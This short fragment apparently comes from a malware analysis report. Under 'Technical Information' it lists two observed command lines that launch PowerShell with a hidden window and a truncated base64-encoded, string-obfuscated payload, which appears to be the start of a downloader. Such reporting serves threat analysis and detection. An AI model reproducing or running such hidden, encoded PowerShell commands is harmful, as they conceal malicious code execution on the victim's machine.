Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAnAEYATAA2AG4AcwBhACcAKwAnAGQAJwArACcAYQAnACsAJwBzAGQAIAAnACsAJwA9ACAAJwArACcAJgAnACsAJwAoAG4AJwArACcAVQBlAG4AbgBVAGUAKwBuAFUAZQBlAG4AVQBlACsAbgAnACsAJwBVAGUAdwAtAG8AYg...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAnAEYATAA2AG4AcwBhACcAKwAnAGQAJwArACcAYQAnACsAJwBzAGQAIAAnACsAJwA9ACAAJwArACcAJgAnACsAJwAoAG4AJwArACcAVQBlAG4AbgBVAGUAKwBuAFUAZQBlAG4AVQBlACsAbgAnACsAJwBVAGUAdwAtAG8AYg...' (with hidden window)